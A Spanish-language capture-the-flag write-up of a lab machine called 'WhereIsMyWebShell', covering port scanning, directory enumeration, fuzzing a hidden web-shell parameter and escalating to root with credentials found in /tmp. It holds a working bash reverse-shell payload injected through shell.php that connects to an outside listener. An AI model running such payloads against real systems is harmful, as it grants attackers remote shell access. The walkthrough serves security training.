WhereIsMyWebShell
✍️ Autor: El Pingüino de Mario🔍 Dificultad: Fácil 📅 Fecha de creación: 12/04/2024
Last updated
Was this helpful?
✍️ Autor: El Pingüino de Mario🔍 Dificultad: Fácil 📅 Fecha de creación: 12/04/2024
Last updated
Was this helpful?
Was this helpful?
En primer lugar, tras conectarnos a la máquina, utilizamos el comando:
ping -c 1 172.17.0.2para verificar la conectividad de red.
A continuación, realizamos el comando:
nmap -sVC -p- -n --min-rate 5000 172.17.0.2para realizar un escaneo de puertos y servicios detallado en la dirección IP.
Como podemos observar durante el escaneo que el puerto 80 perteneciente al servicio HTTP está abierto por lo que a continuación se indagará más.
Se utiliza el comando:
sudo nmap -sCV -p80 -v 172.17.0.2para que nos proporcione más información sobre esos puertos específicamente.
Seguimos indagando más sobre los puertos y ahora indagamos sobre el servicio HTTP. Se ingresó la dirección IP en el navegador lo que llevó a que la página web de una Academia de Inglés.
Si revisamos la página web nos dice que hay un secreto en el directorio /tmp.
Ahora buscaremos directorios y archivos con la herramienta Gobuster a través de:
gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,php,txt,xmlNos encontramos una archivo llamado shell.php en que imaginamos que es una WebShell y nos da una pista tal como se llama la máquina.
http://172.17.0.2/shell.php?cmd=idNo nos devuelve nada por lo que realizamos fuzzing.
wfuzz -c --hc=404,500 -t 200 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt http://172.17.0.2/shell.php?FUZZ=idDescubrimos que el parámetro es parameter.
Aprovechamos eso para hacer una Reverse Shell.
http://172.17.0.2/shell.php?parameter=bash -c "bash -i >%26 /dev/tcp/192.168.255.136/443 0>%261"Nos ponemos en escucha.
Hacemos el tratamiento de la TTY para trabajar más cómodos.
Al estar dentro y ejecutar:
whoamiaún no somos root, por lo que hacemos:
sudo -lpara ver si hay algo para explotar. No tenemos permisos SUDO.
Revisamos el archivo que hay en el directorio /tmp.
Nos logueamos con root con esas credenciales.
